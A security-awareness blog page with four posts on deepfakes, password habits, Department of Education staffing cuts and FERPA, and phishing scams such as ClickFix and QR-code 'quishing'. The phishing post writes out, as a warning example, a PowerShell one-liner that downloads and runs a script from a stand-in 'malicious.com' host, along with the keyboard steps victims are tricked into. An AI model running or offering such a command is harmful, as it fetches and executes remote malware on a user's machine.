Anthony Duran - Horizon Helix

The Deepfake Dilemma: Rising Threats and How to Stay Protected

Anthony Duran on April 29, 2025

Deepfakes, AI-generated audio, video, or images designed to mimic real people, have quickly evolved from experimental curiosities into dangerous tools for deception. As technology continues to advance, so does the ability for malicious actors to weaponize deepfakes for fraud, misinformation, and personal attacks. In 2025, the deepfake landscape presents serious challenges across personal, professional, and political arenas.

How Deepfakes are Made

Deepfakes are created using artificial intelligence, specifically deep learning models like autoencoders or generative adversarial networks (GANs). The process starts by training these models on large datasets of photos and videos of a person, allowing the AI to learn facial expressions, movements, and voice patterns. Once trained, the model can generate realistic but fake content by swapping faces in videos or mimicking voices. After the initial creation, post-processing techniques help enhance realism, such as smoothing artifacts (noticeable errors like 4 or 6 fingers or unnatural twitches) and syncing lip movements. Common software used to make deepfakes includes DeepFaceLab, Faceswap, Avatarify, and voice cloning tools like Descript’s Overdub. While these tools can be used creatively in entertainment or education, they also raise serious concerns around misinformation and impersonation.

This is an example of a deepfake side by side comparison.

The Growing Impact of Deepfakes

Victims of deepfakes, particularly women and minors,* are increasingly targeted with explicit or defamatory content. These fabricated videos can cause severe emotional distress, social stigma, and career harm, even when the content is proven false. Criminals are also using deepfakes to impersonate executives and trick employees into transferring money or divulging sensitive information. A commonly known deepfake scam happened last year as criminals exploited a company approximately $25 million USD.

*Read more about why women and minors are targeted more than other demographics.

Video conferencing tools and voice messaging platforms are now common channels for these scams, which can cause massive financial losses. In the political sphere, deepfakes of public figures are being used to spread false narratives and incite unrest. As these videos go viral on social media, they erode public trust, manipulate public opinion, and undermine democratic processes.

Protecting Against Deepfake Threats

To protect against these threats, it is important to verify content before sharing. One quick way to check is looking at the URL. Authenticity should never be assumed. Always check for inconsistencies in movement, lighting, or speech patterns and cross-reference information with trusted news outlets or official sources. AI-powered detection tools can also be used to identify deepfakes, analyzing digital fingerprints, facial patterns, and audio signals for manipulation. Limiting personal exposure online is another effective measure. Reducing the availability of personal photos, videos, and voice recordings by adjusting privacy settings can help limit the data that deepfake creators rely on.

It is important to understand the legal tools that are available as more states are introducing legislation to combat deepfakes. In an effort to defend against deepfakes, New Jersey passed legislation in April 2025 against “deceptive media made with artificial intelligence”. This is not long after California’s AB2655, which helps defend against deepfak es in the political setting.

Moving Forward in the Deepfake Era

Deepfakes will continue to improve in quality and accessibility, making detection and prevention more difficult. A combination of legal protections, public awareness, and evolving technology will be essential in managing this growing threat. Digital literacy and critical thinking are more important than ever. Understanding how deepfakes are made and used can empower individuals and organizations to better protect themselves and others from the harm they may cause.

Strong Passwords: Best Practices for Protection and Prevention

Anthony Duran on April 25, 2025

Strong password habits are essential to protecting personal and professional data from cyber threats. Weak passwords are one of the biggest security risks, making it easier for hackers to gain unauthorized access to accounts. In an increasingly digital world, following the best practices for password security can reduce the risk of data breaches and identity theft.

Best Password Protection Practices

Use Unique Passwords for Each Account Reusing passwords across multiple accounts increases the risk of a security breach. If one password is compromised, hackers can access all accounts that share the same credentials.
Create Complex Passwords A strong password should be at least 12 characters long and include a mix of uppercase and lowercase letters, numbers, and special characters. Avoid using easily guessed words like “password” or “123456”.
Enable Multi-Factor Authentication (MFA) MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone or an authentication app.
Use a Password Manager Password managers help generate and store complex passwords securely. This reduces the need to remember multiple passwords while keeping them protected. Apple’s iCloud Keychain is a perfect example.
Avoid Sharing Passwords Sharing passwords, even with trusted individuals, increases the risk of unauthorized access. If you need to send an email, Office365 has the option to make emails encrypted with the following steps:
- Creating a new email
- Going to ‘Options:

- Finding the lock button in the upper right corner of the task bar and selecting ‘Encrypt’:

*A second option is to simply type “confidential” in the subject line to encrypt the email, and this will still show the word “confidential” in the subject line as seen above. This can be done at any point in the subject line.

Change Passwords Periodically Regularly updating passwords helps minimize the risk of long-term exposure in case of a security breach. Change passwords immediately if you suspect any unauthorized access.

Be Cautious of Phishing Attacks Cybercriminals use phishing emails and fake websites to trick users into revealing their passwords. Always verify the legitimacy of emails and websites before entering credentials. For example, a fraudulent website may replace easily mistakable letters like uppercase “i” for lowercase “L”. This could look as convincing as PayPaI(.)com If you ever feel that the URL may be compromised, you can always type the URL you know to be correct manually.

By adopting these password protection habits, you can strengthen your online security and reduce the risk of cyber threats. Taking a proactive approach to password management is a simple yet effective way to safeguard your personal and professional information. Taking an extra minute to verify if something is legitimate may save hours of hassle.

The Department of Education’s Current Status

Anthony Duran on April 11, 2025

As of March 21, 2025, the U.S. Department of Education (ED) has reduced its workforce to approximately 2,183 employees—a stark drop from the 4,133 employees who served at the start of President Trump’s term. While the Department continues to function, this nearly 50% reduction in staffing raises serious concerns about its ability to deliver on core responsibilities, especially in areas related to student data privacy and cybersecurity oversight.

One of the offices most affected is the Family Policy Compliance Office (FPCO), the team charged with enforcing the Family Educational Rights and Privacy Act (FERPA). With a diminished staff, the FPCO will likely face significant delays in processing complaints and ensuring educational institutions comply with federal privacy laws.

Although the Department remains active and continues to issue public press releases, industry leaders and cybersecurity experts are raising alarm bells. Their concerns are not just about internal slowdowns—but about a weakened infrastructure that leaves millions of students’ personal data vulnerable to breaches, misuse, and long-term harm.

Why This Matters: FERPA at Risk

FERPA is a cornerstone of student privacy in the United States. It gives parents and eligible students the right to:

Access their education records

Request corrections to inaccurate data

Control the disclosure of personal information from those records

Without the proper enforcement of FERPA, these protections are at risk. Educational institutions already struggle to comply with privacy standards due to budget constraints and varying levels of IT expertise. When oversight is weak or delayed, the consequences can be serious—from unauthorized access to student data to full-scale data breaches.

The FPCO’s workload is significant, and with fewer staff to investigate complaints or provide guidance, issues may fall through the cracks. This isn’t just speculation: industry leaders have publicly warned that the ED’s workforce reduction will slow down data protection efforts and weaken the very standards meant to protect families.

According to StateScoop, industry groups and cybersecurity experts have been “alarmed” by the cuts. The Consortium for School Networking (CoSN) expressed concern that cybersecurity will take a backseat as resources dwindle. Cyberattacks on school systems have already been increasing year-over-year, and the federal government is one of the few support systems local schools can rely on for guidance.

Even more direct are the warnings in Fox4KC’s report. The article highlights expert opinions stating that student privacy is “squarely at risk” if the ED is eliminated or scaled back any further. FERPA, they argue, doesn’t enforce itself—it requires active oversight and intervention.

The Bigger Picture: Cybersecurity & the Education Sector

It’s important to understand the broader context. The education sector has become an increasingly frequent target for cyberattacks. Hackers view K–12 institutions and universities as vulnerable and lucrative targets due to the volume of sensitive data they hold—names, addresses, social security numbers, medical records, and more.

When data breaches occur, students and their families can face long-term consequences such as identity theft, credit damage, and emotional distress. The ability of federal agencies like the ED to step in and enforce data privacy standards is not a luxury—it’s a necessity.

With the ED’s reduced workforce, fewer audits, delayed investigations, and weakened compliance follow-ups are almost inevitable. This creates a dangerous environment where bad actors can exploit loopholes or slow enforcement cycles.

Schools may also suffer from a lack of clear direction on how to improve their own cybersecurity. Many districts lack the resources or expertise to implement best practices and often rely on federal guidance to do so. If that guidance is no longer available in a timely or consistent way, school systems may be left to fend for themselves—an uneven playing field that leaves students in less-resourced areas especially vulnerable.

What You Can Do to Protect Your Family’s Information

While systemic protections are essential, individual families still have the power to take important steps to safeguard their own data. Here are a few key actions you can take:

Strengthen Passwords

Use strong, unique passwords for each of your online accounts, especially those related to school portals, parent portals, or educational apps. A password manager can help you keep track of them all securely.

Enable Multi-Factor Authentication (MFA)

Whenever possible, turn on MFA for added protection. This often involves receiving a code via text or email before logging in, making it much harder for unauthorized users to access your accounts.

Stay Alert to Phishing

Teach your family to recognize phishing emails and suspicious links. These scams often look like legitimate communication from schools but are actually designed to steal information.

Update Devices Regularly

Make sure all devices—laptops, tablets, phones—are updated with the latest security patches and operating systems.

Avoid Public Wi-Fi for Sensitive Tasks

Never access sensitive education-related accounts or financial information while on public Wi-Fi unless you’re using a secure Virtual Private Network (VPN).

Request Transparency from Schools

You have the right to ask schools how they manage and protect your child’s data. If they use third-party vendors or cloud services, ask about their policies and compliance with FERPA.

Advocating for Stronger Protections

Beyond taking personal precautions, families can and should advocate for systemic change:

Contact school administrators and local school boards to ask how they’re adapting to the ED’s reduced support.

Support legislation at the state and federal level that enhances cybersecurity funding and mandates minimum privacy standards in schools.

Join or start parent advocacy groups that can elevate these concerns and push for better data practices.

Stay Informed

Despite the reduction in staff, the U.S. Department of Education remains active and continues to post updates and press releases. Staying informed can help you understand what changes are occurring at the federal level and how they may affect your community.

Visit https://www.ed.gov/about/news for the latest developments.

References

U.S. Department of Education Initiates Reduction in Force

StateScoop: Industry Groups Alarmed by Education Department Cuts

Fox4KC: Cybersecurity Experts Warn Student Privacy at Risk

The Rise of Advanced Phishing Scams and How to Stay Safe

Anthony Duran on March 21, 2025

Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access. Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans.

Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing” Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised.

How to Stay Safe

With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:

- Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting.

- Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example:
  powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”
  could be inserted through three steps
  
  1. ⊞ +R
  2. CTRL+V
  3. Enter

- Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.

- Keep software and security tools updated to detect and block phishing attempts before they cause harm.

- Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams.

By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions, Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you time and stress from being a victim of a scam.